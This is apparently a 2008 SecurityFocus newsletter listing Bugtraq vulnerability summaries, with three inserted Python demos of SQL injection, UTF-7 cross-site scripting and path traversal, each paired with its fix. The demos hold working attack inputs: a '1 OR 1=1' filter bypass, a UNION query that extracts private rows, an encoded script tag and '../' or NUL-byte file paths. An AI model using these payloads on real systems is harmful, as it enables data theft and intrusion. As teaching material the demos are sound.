Friday, June 20, 2008

SecurityFocus Newsletter #458
----------------------------------------

This issue is sponsored by Black Hat USA:

Attend Black Hat USA, August 2-7 in Las Vegas, the world's premier technical event for ICT security experts. Featuring 40 hands-on training courses and 80 Briefings presentations with lots of new content and new tools. Network with 4,000 delegates from 50 nations. Visit product displays by 30 top sponsors in a relaxed setting.

www.blackhat.com


SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1. Racing Against Reversers
2. Anti-Social Networking
II. BUGTRAQ SUMMARY
1. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
2. Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability
3. CMS-BRD 'index.php' SQL Injection Vulnerability
4. TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting Vulnerability
5. Samart-cms 'site.php' SQL Injection Vulnerability
6. Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
7. eLineStudio Site Composer Multiple Input Validation and Unauthorized Access Vulnerabilities
8. CGIWrap Error Page Handling Cross Site Scripting Vulnerability
9. OFFSystem HTTP Headers Remote Buffer Overflow Vulnerability
10. MediaWiki WikiHiero Extension Multiple Cross Site Scripting Vulnerabilities
11. Lyris ListManager 'words' Parameter Cross Site Scripting Vulnerability
12. Skulltag Malformed Packet Denial of Service Vulnerability
13. OpenDocMan 'out.php' Cross-Site Scripting Vulnerability
14. Crysis HTTP/XML-RPC Service Remote Denial of Service Vulnerability
15. Windows Media Player ASX PlayList File Heap Overflow Vulnerability
16. Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability
17. Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability
18. Windows Media Player Remote ASF File Buffer Overflow Vulnerability
19. Novell iPrint Client ActiveX Control Multiple Stack Overflow Vulnerabilities
20. Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
21. Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
22. AJAX Chat Multiple Remote Vulnerabilities
23. Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
24. Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities
25. Computer Associates ARCserve Backup Discovery Service Remote Denial Of Service Vulnerability
26. Microsoft Internet Explorer 'setRequestHeader()' Multiple Vulnerabilities
27. ClamAV 'petite.c' Invalid Memory Access Denial Of Service Vulnerability
28. Linux Kernel CIFS Transport.C Remote Buffer Overflow Vulnerability
29. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
30. Linux Kernel RLIMIT_CPU Zero Limit Handling Local Security Bypass Vulnerability
31. Linux Kernel PowerPC 'chrp/setup.c' NULL Pointer Dereference Denial of Service Vulnerability
32. Linux Kernel Driver Fault Handler 'mmap.c' Local Denial of Service Vulnerability
33. Linux Kernel 2.6.22.16 and Prior Multiple Memory Corruption Vulnerabilities
34. Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability
35. Linux Kernel 'dnotify.c' Local Race Condition Vulnerability
36. Orlando CMS classes 'GLOBALS['preloc']' Parameter Multiple Remote File Include Vulnerabilities
37. Apple Safari Automatic File Launch Remote Code Execution Vulnerability
38. Apple Safari and Microsoft Windows Client-side Code Execution Vulnerability
39. Mozilla Client Products Multiple Remote Vulnerabilities
40. Fetchmail Verbose Mode Large Log Messages Remote Denial of Service Vulnerability
41. MaxTrade Trade Module SQL Injection Vulnerability
42. PHP 5 'posix_access()' Function 'safe_mode' Bypass Directory Traversal Vulnerability
43. Cisco Intrusion Prevention System (IPS) Platforms Inline Mode Denial of Service Vulnerability
44. Apple Mac OS X ImageIO BMP/GIF Image Information Disclosure Vulnerability
45. Microsoft Visual Basic Enterprise Edition 6 'vb6skit.dll' Remote Buffer Overflow Vulnerability
46. X.Org X Server RENDER Extension 'ProcRenderCreateCursor()' Denial of Service Vulnerability
47. X.Org X Server MIT-SHM Extension Information Disclosure Vulnerability
48. X.Org X server RENDER Extension Multiple Integer Overflow Vulnerabilities
49. Microsoft Windows Bluetooth Stack Remote Code Execution Vulnerability
50. UltraEdit FTP/SFTP 'LIST' Command Directory Traversal Vulnerability
51. Exero CMS 'theme' Parameter Multiple Local File Include Vulnerabilities
52. ManageEngine OpUtils 'hostName' HTML Injection Vulnerability
53. CRE Loaded Multiple HTML Injection Vulnerabilities
54. Traindepot Local File Include and Cross-Site Scripting Vulnerabilities
55. WebCalendar 'tools/send_reminders.php' Remote File Include Vulnerability
56. EroCMS 'site' parameter SQL Injection Vulnerability
57. ClipShare 'group_posts.php' SQL Injection Vulnerability
58. Adobe Flex 3 History Management 'historyFrame.html' Cross-Site Scripting Vulnerability
59. MyShoutPro 'admin_access' Cookie Parameter Authentication Bypass Vulnerability
60. easyTrade 'detail.php' SQL Injection Vulnerability
61. PHP Site Lock 'index.php' SQL Injection Vulnerability
62. Foxy 'fs' Parameter Memory Exhaustion Remote Denial of Service Vulnerability
63. FreeCMS 'index.php' SQL Injection Vulnerability
64. ThaiQuickCart 'PHPSESSID' Cookie Parameter Local File Include Vulnerability
65. Basic-CMS 'index.php' SQL Injection Vulnerability
66. Bizon-CMS 'photo/index.php' SQL Injection Vulnerability
67. Comparison Engine Power 'product.detail.php' SQL Injection Vulnerability
68. Jura Internet Connectivity Kit Unauthorized Access Input-Validation Vulnerability
69. Opera Web Browser 9.27 Multiple Security Vulnerabilities
70. LifeType 'index.php' SQL Injection Vulnerability
71. photokorn 'pic' Parameter SQL Injection Vulnerability
72. Multiple Vendor HTML Form Protocol Vulnerability
73. OpenBSD GNU Screen Locked Authentication Bypass Vulnerability
74. Photokorn Multiple SQL Injection Vulnerabilities
75. FreeType TrueType Font 'SHC' Heap Buffer Overflow Vulnerability
76. FreeType2 Printer Font Binary Private Dictionary Table Integer Overflow Vulnerability
77. FreeType2 Printer Font Binary Remote Code Execution Vulnerability
78. Debian OpenSSL Package Random Number Generator Weakness
79. BlognPlus Unspecified SQL Injection Vulnerability
80. AJ Auction 'id' Parameter SQL Injection Vulnerability
81. AJ Auction Pro 'cate_id' Parameter SQL Injection Vulnerability
82. Lotus Core CMS 'phpbb_root_path' Parameter Multiple Remote File Include Vulnerabilities
83. TYPO3 Frontend Filemanager Extension Unspecified Code Execution Vulnerability
84. Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow Vulnerability
85. CaupoShop 'csc_article_details.php' SQL Injection Vulnerability
86. TYPO3 nepa-design.de Spam Protection Extension Unspecified Setting Manipulation Vulnerability
87. TYPO3 Resource Library Extension Unspecified Cross-Site Scripting Vulnerability
88. MindTouch DekiWiki Search Cross-Site Scripting Vulnerability
89. PHP 'rfc822_write_address()' Function Buffer Overflow Vulnerability
90. TYPO3 JobControl Extension Unspecified Cross-Site Scripting Vulnerability
91. TYPO3 Random Prayer Extension SQL Injection Vulnerability
92. TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified Input Validation Vulnerabilities
93. TYPO3 Download system Extension SQL Injection Vulnerability
94. TYPO3 Fussballtippspiel Extension SQL Injection Vulnerability
95. TYPO3 TIMTAB Social Bookmark Icons Extension SQL Injection Vulnerability
96. TYPO3 Diocese of Portsmouth Training Courses Extension SQL Injection Vulnerability
97. TYPO3 CoolURI Extension SQL Injection Vulnerability
98. TYPO3 Diocese of Portsmouth Calendar Today Extension SQL Injection Vulnerability
99. OwnRS 'clanek.php' Multiple Input Validation Vulnerabilities
100. vBulletin Moderation Control Panel 'redirect' Parameter Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS
1. Ransomware resisting crypto cracking efforts
2. Boycott spotlights antivirus testing issues
3. Hired gun blamed for business outage
4. Legal experts wary of MySpace hacking charges
IV. SECURITY JOBS LIST SUMMARY
1. [SJ-JOB] Director, Computer Security, Fort Lauderdale
2. [SJ-JOB] Certification & Accreditation Engineer, Laurel
3. [SJ-JOB] Sr. Security Analyst, Washington
4. [SJ-JOB] Sr. Security Engineer, Jersey City
5. [SJ-JOB] Sr. Security Engineer, San Jose
6. [SJ-JOB] Security Consultant, Columbus/Cincinnati/Indianapolis
7. [SJ-JOB] Sales Engineer, Bangalore, New Delhi and Hyderabad
8. [SJ-JOB] Security Architect, Chicago
9. [SJ-JOB] Security Engineer, Herndon
10. [SJ-JOB] Security System Administrator, Washington
11. [SJ-JOB] Penetration Engineer, San Francisco
12. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
13. [SJ-JOB] Application Security Engineer, Chicago
14. [SJ-JOB] Sr. Product Manager, Boston
15. [SJ-JOB] Security Consultant, Atlanta
16. [SJ-JOB] Security Engineer, Atlanta
17. [SJ-JOB] Developer, Arlington
18. [SJ-JOB] Technical Writer, Alpharetta
19. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
20. [SJ-JOB] Security Consultant, Atlanta
21. [SJ-JOB] Sr. Product Manager, Atlanta
22. [SJ-JOB] Sales Engineer, St. Paul
23. [SJ-JOB] Sr. Product Manager, San Jose
24. [SJ-JOB] Sr. Product Manager, Washington
V. INCIDENTS LIST SUMMARY
VI. VULN-DEV RESEARCH LIST SUMMARY
VII. MICROSOFT FOCUS LIST SUMMARY
1. default for requiring authentication 2003
VIII. SUN FOCUS LIST SUMMARY
IX. LINUX FOCUS LIST SUMMARY
1. Vulnerability and Patch-Management in Linux (and other Unix)
X. UNSUBSCRIBE INSTRUCTIONS
XI. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Racing Against Reversers
By Federico Biancuzzi
Each time a new digital rights management (DRM) system is released, hackers are not far behind in cracking it. Reverse engineers have taken down the security protecting content encoded for Windows Media, iTunes, DVDs, and HD-DVDs.

http://www.securityfocus.com/columnists/474

2. Anti-Social Networking
By Mark Rasch
On May 15, 2008, a federal grand jury in Los Angeles indicted 49-year-old Lori Drew of O'Fallon, Missouri, on charges of unauthorized access to a computer, the charge typically used in hacking cases. Yet Drew's alleged actions had little to do with computer intrusions.

http://www.securityfocus.com/columnists/473


II. BUGTRAQ SUMMARY
--------------------
1. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
BugTraq ID: 29183
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29183
Summary:
Xen is prone to a local denial-of-service vulnerability.

Successfully exploiting this issue will crash the affected application, denying service to legitimate users.
Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

2. Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability
BugTraq ID: 29831
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29831
Summary:
Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).

Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.

This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable.

3. CMS-BRD 'index.php' SQL Injection Vulnerability
BugTraq ID: 29816
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29816
Summary:
CMS-BRD is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
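
The SQL-injection entries in this issue (this one and the many 'index.php'-style items that follow) describe the same defect: a request parameter is concatenated into the query text, so the attacker rewrites the query rather than supplying a value for it. The following is an added example, not code from CMS-BRD or any other product listed here. It uses Python's sqlite3 module as a stand-in for the PHP/MySQL stack, with a constructed 'pages' table and hypothetical fetch_page_vulnerable/fetch_page_safe functions, to show the bug beside its fix against a filter-bypass payload and a UNION exfiltration payload.

```python
import sqlite3

# Constructed sample table; it does not reflect CMS-BRD's real schema.
SAMPLE_ROWS = [
    (1, "Welcome", "published"),
    (2, "Draft post", "draft"),
    (3, "Hidden admin note", "private"),
]


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, status TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def fetch_page_vulnerable(conn: sqlite3.Connection, page_id: str) -> list:
    """The bug class: the request parameter (think ?id=) is spliced into the SQL text.

    The developer meant 'only published pages, by id'; the attacker gets to change that.
    """
    sql = "SELECT id, title FROM pages WHERE status = 'published' AND id = " + page_id
    return conn.execute(sql).fetchall()


def fetch_page_safe(conn: sqlite3.Connection, page_id: str) -> list:
    """Parameter binding: the value is data, so it can never alter the query's structure."""
    sql = "SELECT id, title FROM pages WHERE status = 'published' AND id = ?"
    return conn.execute(sql, (page_id,)).fetchall()


# Constructed attacker inputs. sqlite3 refuses stacked statements, so these use the
# boolean and UNION techniques that work inside a single SELECT.
BYPASS_FILTER = "1 OR 1=1"
EXFILTRATE = "0 UNION SELECT id, title FROM pages WHERE status = 'private'"


def demo() -> dict:
    conn = open_db()
    return {
        "normal": fetch_page_vulnerable(conn, "1"),
        "vuln_bypass": fetch_page_vulnerable(conn, BYPASS_FILTER),  # every row, status ignored
        "vuln_exfil": fetch_page_vulnerable(conn, EXFILTRATE),      # the private row
        "safe_bypass": fetch_page_safe(conn, BYPASS_FILTER),        # nothing: '1 OR 1=1' is just text
        "safe_exfil": fetch_page_safe(conn, EXFILTRATE),            # nothing
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:12} -> {rows}")
```

The parameterized form is the fix for every entry of this class; escaping the value by hand (or relying on PHP's magic_quotes) only helps for quoted string contexts, and the id=... case above is unquoted, so no amount of quote escaping would have stopped the first payload.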

4. TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29815
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29815
Summary:
The DCD GoogleMap extension for TYPO3 is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

DCD GoogleMap versions prior to 1.1.1 are vulnerable.

5. Samart-cms 'site.php' SQL Injection Vulnerability
BugTraq ID: 29814
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29814
Summary:
samart-cms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

samart-cms 2.0 is vulnerable; other versions may also be affected.

6. Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
BugTraq ID: 29813
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29813
Summary:
Academic Web Tools CMS is prone to multiple input-validation vulnerabilities, including:

- A directory-traversal vulnerability
- Multiple cross-site scripting vulnerabilities
- An HTML-injection vulnerability
- An SQL-injection vulnerability
- Multiple session-fixation vulnerabilities

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, gain unauthorized access to the affected application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.

Academic Web Tools CMS 1.4.2.8 is vulnerable; other versions may also be affected.

7. eLineStudio Site Composer Multiple Input Validation and Unauthorized Access Vulnerabilities
BugTraq ID: 29812
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29812
Summary:
eLineStudio Site Composer is prone to multiple vulnerabilities due to a lack of input validation and of access restrictions. These issues include two SQL-injection issues, four cross-site scripting issues, and two vulnerabilities that result in unauthorized access to administrative functions.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, create or delete folders on the webserver, or exploit latent vulnerabilities in the underlying database.

eLineStudio Site Composer 2.6 is vulnerable; other versions may also be affected.

8. CGIWrap Error Page Handling Cross Site Scripting Vulnerability
BugTraq ID: 29811
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29811
Summary:
CGIWrap is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

CGIWrap versions prior to 4.1 are vulnerable.

9. OFFSystem HTTP Headers Remote Buffer Overflow Vulnerability
BugTraq ID: 29809
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29809
Summary:
OFFSystem is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The vulnerability occurs when parsing HTTP headers.

An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

Versions of OFFSystem up to 0.19.14 are vulnerable.

10. MediaWiki WikiHiero Extension Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 29762
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29762
Summary:
WikiHiero, a MediaWiki extension, is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

11. Lyris ListManager 'words' Parameter Cross Site Scripting Vulnerability
BugTraq ID: 29761
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29761
Summary:
Lyris ListManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Lyris ListManager 9.3d is vulnerable; previous versions may also be affected.

12. Skulltag Malformed Packet Denial of Service Vulnerability
BugTraq ID: 29760
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29760
Summary:
Skulltag is prone to a vulnerability that can cause denial-of-service conditions.

A successful attack will deny service to legitimate users.

Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected.

13. OpenDocMan 'out.php' Cross-Site Scripting Vulnerability
BugTraq ID: 29765
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29765
Summary:
OpenDocMan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.

14. Crysis HTTP/XML-RPC Service Remote Denial of Service Vulnerability
BugTraq ID: 29759
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29759
Summary:
Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.

Crysis 1.21 is vulnerable; other versions may also be affected.

15. Windows Media Player ASX PlayList File Heap Overflow Vulnerability
BugTraq ID: 21247
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/21247
Summary:
Windows Media Player is prone to a heap-overflow issue.

Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the affected user. Failed exploit attempts likely result in application crashes.

16. Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability
BugTraq ID: 29769
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29769
Summary:
Microsoft Word is prone to a remote memory-corruption vulnerability.

An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files.

Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user.

17. Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability
BugTraq ID: 22359
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/22359
Summary:
Microsoft Windows is prone to a command-execution vulnerability in the built-in voice-recognition capability of its Speech Components.

An attacker can exploit this issue to execute commands on a victim user's computer.

NOTE: Given the nature of this vulnerability, victim users will notice exactly what is occurring as it happens.

18. Windows Media Player Remote ASF File Buffer Overflow Vulnerability
BugTraq ID: 21505
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/21505
Summary:
Windows Media Player is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data.

Attackers may attempt to exploit this issue by coercing users to visit a malicious website or to access malicious ASF files.

Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the user running the affected application. This facilitates the remote compromise of affected computers.

19. Novell iPrint Client ActiveX Control Multiple Stack Overflow Vulnerabilities
BugTraq ID: 29736
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29736
Summary:
Novell iPrint Client ActiveX control is prone to multiple stack-based buffer-overflow vulnerabilities.

An attacker can exploit these issues by tricking a victim into viewing a malicious web page. A successful attack will allow attacker-supplied code to run in the context of the currently logged-in user.

The issue affects versions prior to iPrint Client 4.36.

20. Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
BugTraq ID: 27237
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/27237
Summary:
The Apache HTTP Server 'mod_status' module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Reportedly, attackers can also use this issue to redirect users' browsers to arbitrary locations, which may aid in phishing attacks.

The issue affects versions prior to Apache 2.2.7-dev, 2.0.62-dev, and 1.3.40-dev.

21. Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
BugTraq ID: 27234
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/27234
Summary:
Apache 'mod_proxy_ftp' is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

This issue is reported to affect versions prior to Apache 2.2.7-dev, Apache 1.3.40-dev, and Apache 2.0.62-dev.
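
Why an undefined charset becomes cross-site scripting: when the Content-Type carries no charset, a browser that sniffs the encoding can settle on UTF-7, in which '<' and '>' are spelled '+ADw-' and '+AD4-'. A body that contains no angle-bracket bytes at all (and so passes any '<' filter) then renders as markup. The following is an added example, not Apache code. It uses a constructed FTP-directory-listing body and a hypothetical audit_response function to show the same bytes read under UTF-8 and under UTF-7, and the check that matters for this bug class: whether the response declares a charset at all.

```python
import re
from typing import Optional

# Constructed sample, not taken from the mod_proxy_ftp report: an FTP directory
# listing whose second file name is <script>alert(1)</script> written in UTF-7.
# The bytes contain no '<' or '>' at all, so a byte-level '<' filter passes them.
LISTING = (
    b"drwxr-xr-x   2 ftp ftp 4096 Jun 20 2008 pub\r\n"
    b"-rw-r--r--   1 ftp ftp   12 Jun 20 2008 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\r\n"
)

TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z][^>]*>")
CHARSET_RE = re.compile(r";\s*charset\s*=\s*\"?([A-Za-z0-9._-]+)", re.I)


def declared_charset(content_type: str) -> Optional[str]:
    """Charset named in a Content-Type header, or None if the server left it undefined."""
    m = CHARSET_RE.search(content_type)
    return m.group(1).lower() if m else None


def visible_tags(body: bytes, charset: str) -> list:
    """HTML tags a browser sees once it has decoded body with the given charset."""
    return TAG_RE.findall(body.decode(charset, errors="replace"))


def audit_response(content_type: str, body: bytes) -> dict:
    """Flag a response whose meaning depends on charset sniffing.

    With no declared charset a sniffing browser of the time could pick UTF-7 from
    the '+ADw-' sequences; with one declared, the same bytes are inert text.
    """
    charset = declared_charset(content_type)
    as_utf7 = visible_tags(body, "utf-7")
    return {
        "declared": charset,
        "tags_if_utf8": visible_tags(body, "utf-8"),
        "tags_if_utf7": as_utf7,
        "sniffable_xss": charset is None and bool(as_utf7),
    }


if __name__ == "__main__":
    print(audit_response("text/html", LISTING))                        # sniffable_xss: True
    print(audit_response("text/html; charset=ISO-8859-1", LISTING))    # sniffable_xss: False
```

Declaring a charset removes the ambiguity; in Apache, the AddDefaultCharset directive is one way to guarantee that every text/html response carries one, and the same check (is a charset present?) is a cheap thing to add to a response-header audit.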

22. AJAX Chat Multiple Remote Vulnerabilities
BugTraq ID: 19238
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/19238
Summary:
AJAX Chat is prone to both a directory-traversal vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit the directory-traversal issue to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

The attacker may also leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

These issues affect AJAX Chat 0.1; other versions may also be vulnerable.
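
The directory-traversal, local-file-include and 'theme'/'PHPSESSID'-parameter entries in this issue share one root cause: a user-supplied name is joined to a directory and opened without checking where the result actually points. The following is an added example, not AJAX Chat's code or any other listed product's. It builds a containment check on os.path.realpath and os.path.commonpath and exercises it against '../', an absolute path, a NUL byte and a planted symlink, on a constructed temporary directory tree; resolve_under, include_theme and make_sample_tree are names chosen for the example.

```python
import os
import tempfile
from pathlib import Path


class TraversalError(ValueError):
    """Raised when a user-supplied path would leave the intended directory."""


def resolve_under(base_dir: str, user_path: str) -> str:
    """Absolute path for user_path, guaranteed to lie inside base_dir.

    realpath() collapses '..' and follows symlinks, so a link planted inside the
    directory that points outside it is caught too. NUL is rejected up front because
    a C-level open() truncates the name there (the classic 'file.php%00.jpg' trick).
    """
    if "\x00" in user_path:
        raise TraversalError("NUL byte in path")
    base = os.path.realpath(base_dir)
    # join() discards base when user_path is absolute; the containment check below catches that
    candidate = os.path.realpath(os.path.join(base, user_path))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        raise TraversalError(f"{user_path!r} escapes {base_dir!r}")
    return candidate


def is_contained(base_dir: str, user_path: str) -> bool:
    try:
        resolve_under(base_dir, user_path)
    except TraversalError:
        return False
    return True


def include_theme(theme_root: str, theme_name: str) -> str:
    """Read a theme file the way 'include($theme)' would, but only from theme_root."""
    with open(resolve_under(theme_root, theme_name), encoding="utf-8") as fh:
        return fh.read()


def make_sample_tree() -> tuple:
    """Constructed fixture: returns (theme_root, secret_path) under a fresh temp directory."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    themes = os.path.join(root, "themes")
    os.mkdir(themes)
    Path(themes, "default.tpl").write_text("<h1>default theme</h1>", encoding="utf-8")
    secret = os.path.join(root, "config.inc")
    Path(secret).write_text("db_password=hunter2", encoding="utf-8")
    try:  # a symlink inside the theme directory that points outside it
        os.symlink(secret, os.path.join(themes, "link.tpl"))
    except (OSError, NotImplementedError):
        pass  # symlinks unavailable on this platform; that case is simply skipped
    return themes, secret


def demo() -> dict:
    themes, secret = make_sample_tree()
    attempts = ["default.tpl", "../config.inc", secret, "default.tpl\x00.jpg"]
    if os.path.islink(os.path.join(themes, "link.tpl")):
        attempts.append("link.tpl")
    results = {}
    for attempt in attempts:
        try:
            results[attempt] = include_theme(themes, attempt)
        except TraversalError:
            results[attempt] = "blocked"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r:40} -> {outcome}")
```

The point of resolving before comparing is that string checks such as "does it start with '../'" miss absolute paths, encoded separators and symlinks; comparing the resolved path against the resolved base handles all of them with one rule.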

23. Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
BugTraq ID: 26663
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/26663
Summary:
Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.

24. Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities
BugTraq ID: 27641
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/27641
Summary:
Adobe Acrobat and Reader are prone to multiple arbitrary remote code-execution and security vulnerabilities.

Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application. Other attacks are also possible.

Versions prior to Adobe Acrobat and Adobe Reader 8.1.2 are vulnerable to these issues.

25. Computer Associates ARCserve Backup Discovery Service Remote Denial Of Service Vulnerability
BugTraq ID: 28927
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/28927
Summary:
Computer Associates ARCserve Backup is affected by a denial-of-service vulnerability because the application mishandles malformed user-supplied input.

A remote attacker may exploit this issue to cause denial-of-service conditions.

CA ARCserve Backup 12.0.5454.0 is affected by this issue; other versions may also be vulnerable.

26. Microsoft Internet Explorer 'setRequestHeader()' Multiple Vulnerabilities
BugTraq ID: 28379
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/28379
Summary:
Microsoft Internet Explorer is prone to multiple vulnerabilities that allow for referer-spoofing, HTTP-request-splitting, and HTTP-request-smuggling attacks.

